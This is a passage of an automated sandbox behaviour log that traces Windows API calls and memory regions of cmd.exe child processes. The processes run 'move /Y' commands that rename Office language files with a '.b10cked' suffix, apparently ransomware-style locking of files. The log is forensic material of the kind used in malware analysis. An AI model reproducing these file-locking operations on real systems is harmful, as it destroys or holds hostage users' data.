| out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6IN~1.TRX", lpFilePart=0x1ef0f4*="PUB6IN~1.TRX") returned 0x3c [0158.103] SetErrorMode (uMode=0x0) returned 0x1 [0158.103] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036")) returned 0x2012 [0158.103] _wcsicmp (_String1="PUB6IN~1.TRX", _String2=".") returned 66 [0158.103] _wcsicmp (_String1="PUB6IN~1.TRX", _String2="..") returned 66 [0158.103] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6IN~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\pub6in~1.trx")) returned 0x2020 [0158.104] SetErrorMode (uMode=0x0) returned 0x0 [0158.104] SetErrorMode (uMode=0x1) returned 0x0 [0158.104] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6IN~1.TRX", nBufferLength=0x104, lpBuffer=0x1ef588, lpFilePart=0x1ef320 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6IN~1.TRX", lpFilePart=0x1ef320*="PUB6IN~1.TRX") returned 0x3c [0158.104] SetErrorMode (uMode=0x0) returned 0x1 [0158.104] SetErrorMode (uMode=0x0) returned 0x0 [0158.104] SetErrorMode (uMode=0x1) returned 0x0 [0158.104] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6INTL.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x1ef790, lpFilePart=0x1ef320 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6INTL.DLL.trx_dll.b10cked", lpFilePart=0x1ef320*="PUB6INTL.DLL.trx_dll.b10cked") returned 0x4c [0158.104] SetErrorMode (uMode=0x0) returned 0x1 [0158.104] SetLastError (dwErrCode=0x0) [0158.104] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6INTL.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\pub6intl.dll.trx_dll.b10cked")) returned 0xffffffff [0158.104] GetLastError () returned 0x2 [0158.104] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6IN~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x1eec9c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eec9c) returned 0x3b2130 [0158.104] FindNextFileW (in: hFindFile=0x3b2130, lpFindFileData=0x1eec9c | out: lpFindFileData=0x1eec9c) returned 0 [0158.105] GetLastError () returned 0x12 [0158.105] FindClose (in: hFindFile=0x3b2130 | out: hFindFile=0x3b2130) returned 1 [0158.106] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6IN~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x3b1cc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3b1cc0) returned 0x3b2130 [0158.107] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6INTL.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x1eef34, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6INTL.DLL.trx_dll.b10cked", lpFilePart=0x0) returned 0x4c [0158.107] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6INTL.DLL.trx_dll", nBufferLength=0x104, lpBuffer=0x1eef34, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6INTL.DLL.trx_dll", lpFilePart=0x0) returned 0x44 [0158.107] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6INTL.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\pub6intl.dll.trx_dll")) returned 0x2020 [0158.107] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6INTL.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\pub6intl.dll.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6INTL.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\pub6intl.dll.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0158.108] FindClose (in: hFindFile=0x3b2130 | out: hFindFile=0x3b2130) returned 1 [0158.108] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x1eeee8 | out: _Buffer=" 1") returned 9 [0158.108] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.108] GetFileType (hFile=0x7) returned 0x2 [0158.108] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0158.108] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1eee74 | out: lpMode=0x1eee74) returned 1 [0158.108] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.108] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeea8 | out: lpConsoleScreenBufferInfo=0x1eeea8) returned 1 [0158.109] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0158.109] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x1eeee8 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0158.110] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x1eeecc, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1eeecc*=0x1a) returned 1 [0158.113] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.113] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0158.113] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.113] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0158.114] _get_osfhandle (_FileHandle=0) returned 0x3 [0158.114] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0158.114] SetConsoleInputExeNameW () returned 0x1 [0158.114] GetConsoleOutputCP () returned 0x1b5 [0158.114] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0158.114] SetThreadUILanguage (LangId=0x0) returned 0x409 [0158.114] exit (_Code=0) Process: id = "266" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea168c0" os_pid = "0xf5c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6IN~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6INTL.REST.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 21830 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 21831 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 21832 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 21833 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 21834 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 21835 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 21836 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 21837 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 21838 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 21839 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 21855 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 21856 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 21857 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 21858 start_va = 0xc0000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 21859 start_va = 0x380000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 21860 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 21861 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 21862 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 21863 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 21864 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 21865 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 21866 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 21867 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 21868 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 21869 start_va = 0x1d0000 end_va = 0x297fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 21870 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 21871 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 21872 start_va = 0x2a0000 end_va = 0x2a6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21873 start_va = 0x2b0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 21874 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 21875 start_va = 0x2d0000 end_va = 0x2d0fff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 21876 start_va = 0x480000 end_va = 0x580fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 21877 start_va = 0x590000 end_va = 0x118ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 21878 start_va = 0x1190000 end_va = 0x12f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001190000" filename = "" Thread: id = 329 os_tid = 0xe9c [0158.472] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cfe1c | out: lpSystemTimeAsFileTime=0x1cfe1c*(dwLowDateTime=0x98630580, dwHighDateTime=0x1d440a9)) [0158.472] GetCurrentProcessId () returned 0xf5c [0158.473] GetCurrentThreadId () returned 0xe9c [0158.473] GetTickCount () returned 0x307ec [0158.473] QueryPerformanceCounter (in: lpPerformanceCount=0x1cfe14 | out: lpPerformanceCount=0x1cfe14*=21526177778) returned 1 [0158.473] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0158.473] __set_app_type (_Type=0x1) [0158.473] __p__fmode () returned 0x76b331f4 [0158.473] __p__commode () returned 0x76b331fc [0158.473] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0158.473] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0158.474] GetCurrentThreadId () returned 0xe9c [0158.474] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe9c) returned 0x38 [0158.474] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0158.474] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0158.474] SetThreadUILanguage (LangId=0x0) returned 0x409 [0158.475] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0158.475] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cfdac | out: phkResult=0x1cfdac*=0x0) returned 0x2 [0158.475] VirtualQuery (in: lpAddress=0x1cfde3, lpBuffer=0x1cfd7c, dwLength=0x1c | out: lpBuffer=0x1cfd7c*(BaseAddress=0x1cf000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0158.475] VirtualQuery (in: lpAddress=0xd0000, lpBuffer=0x1cfd7c, dwLength=0x1c | out: lpBuffer=0x1cfd7c*(BaseAddress=0xd0000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0158.475] VirtualQuery (in: lpAddress=0xd1000, lpBuffer=0x1cfd7c, dwLength=0x1c | out: lpBuffer=0x1cfd7c*(BaseAddress=0xd1000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0158.475] VirtualQuery (in: lpAddress=0xd3000, lpBuffer=0x1cfd7c, dwLength=0x1c | out: lpBuffer=0x1cfd7c*(BaseAddress=0xd3000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0158.475] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x1cfd7c, dwLength=0x1c | out: lpBuffer=0x1cfd7c*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0158.475] GetConsoleOutputCP () returned 0x1b5 [0158.475] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0158.475] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0158.475] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.475] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0158.475] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.475] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0158.475] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.476] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0158.476] _get_osfhandle (_FileHandle=0) returned 0x3 [0158.476] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0158.476] _get_osfhandle (_FileHandle=0) returned 0x3 [0158.476] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0158.476] GetEnvironmentStringsW () returned 0x390218* [0158.476] FreeEnvironmentStringsW (penv=0x390218) returned 1 [0158.476] GetEnvironmentStringsW () returned 0x390218* [0158.476] FreeEnvironmentStringsW (penv=0x390218) returned 1 [0158.476] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ced1c | out: phkResult=0x1ced1c*=0x40) returned 0x0 [0158.476] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ced24, lpData=0x1ced28, lpcbData=0x1ced20*=0x1000 | out: lpType=0x1ced24*=0x0, lpData=0x1ced28*=0xa8, lpcbData=0x1ced20*=0x1000) returned 0x2 [0158.477] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ced24, lpData=0x1ced28, lpcbData=0x1ced20*=0x1000 | out: lpType=0x1ced24*=0x4, lpData=0x1ced28*=0x1, lpcbData=0x1ced20*=0x4) returned 0x0 [0158.477] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ced24, lpData=0x1ced28, lpcbData=0x1ced20*=0x1000 | out: lpType=0x1ced24*=0x0, lpData=0x1ced28*=0x1, lpcbData=0x1ced20*=0x1000) returned 0x2 [0158.477] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ced24, lpData=0x1ced28, lpcbData=0x1ced20*=0x1000 | out: lpType=0x1ced24*=0x4, lpData=0x1ced28*=0x0, lpcbData=0x1ced20*=0x4) returned 0x0 [0158.477] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ced24, lpData=0x1ced28, lpcbData=0x1ced20*=0x1000 | out: lpType=0x1ced24*=0x4, lpData=0x1ced28*=0x40, lpcbData=0x1ced20*=0x4) returned 0x0 [0158.477] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ced24, lpData=0x1ced28, lpcbData=0x1ced20*=0x1000 | out: lpType=0x1ced24*=0x4, lpData=0x1ced28*=0x40, lpcbData=0x1ced20*=0x4) returned 0x0 [0158.477] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ced24, lpData=0x1ced28, lpcbData=0x1ced20*=0x1000 | out: lpType=0x1ced24*=0x0, lpData=0x1ced28*=0x40, lpcbData=0x1ced20*=0x1000) returned 0x2 [0158.477] RegCloseKey (hKey=0x40) returned 0x0 [0158.477] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ced1c | out: phkResult=0x1ced1c*=0x40) returned 0x0 [0158.477] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ced24, lpData=0x1ced28, lpcbData=0x1ced20*=0x1000 | out: lpType=0x1ced24*=0x0, lpData=0x1ced28*=0x40, lpcbData=0x1ced20*=0x1000) returned 0x2 [0158.477] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ced24, lpData=0x1ced28, lpcbData=0x1ced20*=0x1000 | out: lpType=0x1ced24*=0x4, lpData=0x1ced28*=0x1, lpcbData=0x1ced20*=0x4) returned 0x0 [0158.477] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ced24, lpData=0x1ced28, lpcbData=0x1ced20*=0x1000 | out: lpType=0x1ced24*=0x0, lpData=0x1ced28*=0x1, lpcbData=0x1ced20*=0x1000) returned 0x2 [0158.477] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ced24, lpData=0x1ced28, lpcbData=0x1ced20*=0x1000 | out: lpType=0x1ced24*=0x4, lpData=0x1ced28*=0x0, lpcbData=0x1ced20*=0x4) returned 0x0 [0158.477] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ced24, lpData=0x1ced28, lpcbData=0x1ced20*=0x1000 | out: lpType=0x1ced24*=0x4, lpData=0x1ced28*=0x9, lpcbData=0x1ced20*=0x4) returned 0x0 [0158.477] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ced24, lpData=0x1ced28, lpcbData=0x1ced20*=0x1000 | out: lpType=0x1ced24*=0x4, lpData=0x1ced28*=0x9, lpcbData=0x1ced20*=0x4) returned 0x0 [0158.477] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ced24, lpData=0x1ced28, lpcbData=0x1ced20*=0x1000 | out: lpType=0x1ced24*=0x0, lpData=0x1ced28*=0x9, lpcbData=0x1ced20*=0x1000) returned 0x2 [0158.477] RegCloseKey (hKey=0x40) returned 0x0 [0158.477] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886381 [0158.477] srand (_Seed=0x5b886381) [0158.477] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6IN~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6INTL.REST.trx_dll.b10cked\"" [0158.477] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6IN~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6INTL.REST.trx_dll.b10cked\"" [0158.477] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0158.478] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x391978, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0158.478] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0158.478] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0158.478] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0158.478] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0158.478] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0158.478] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0158.478] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0158.478] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0158.478] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0158.478] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0158.478] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0158.478] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0158.478] GetEnvironmentStringsW () returned 0x392368* [0158.478] FreeEnvironmentStringsW (penv=0x392368) returned 1 [0158.478] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0158.478] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0158.478] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0158.479] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0158.479] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0158.479] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0158.479] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0158.479] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0158.479] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0158.479] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0158.479] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1cfae8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0158.479] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1cfae8, lpFilePart=0x1cfae4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1cfae4*="Desktop") returned 0x18 [0158.479] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0158.479] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1cf864 | out: lpFindFileData=0x1cf864) returned 0x3909f8 [0158.479] FindClose (in: hFindFile=0x3909f8 | out: hFindFile=0x3909f8) returned 1 [0158.479] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1cf864 | out: lpFindFileData=0x1cf864) returned 0x3909f8 [0158.479] FindClose (in: hFindFile=0x3909f8 | out: hFindFile=0x3909f8) returned 1 [0158.479] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1cf864 | out: lpFindFileData=0x1cf864) returned 0x3909f8 [0158.479] FindClose (in: hFindFile=0x3909f8 | out: hFindFile=0x3909f8) returned 1 [0158.480] 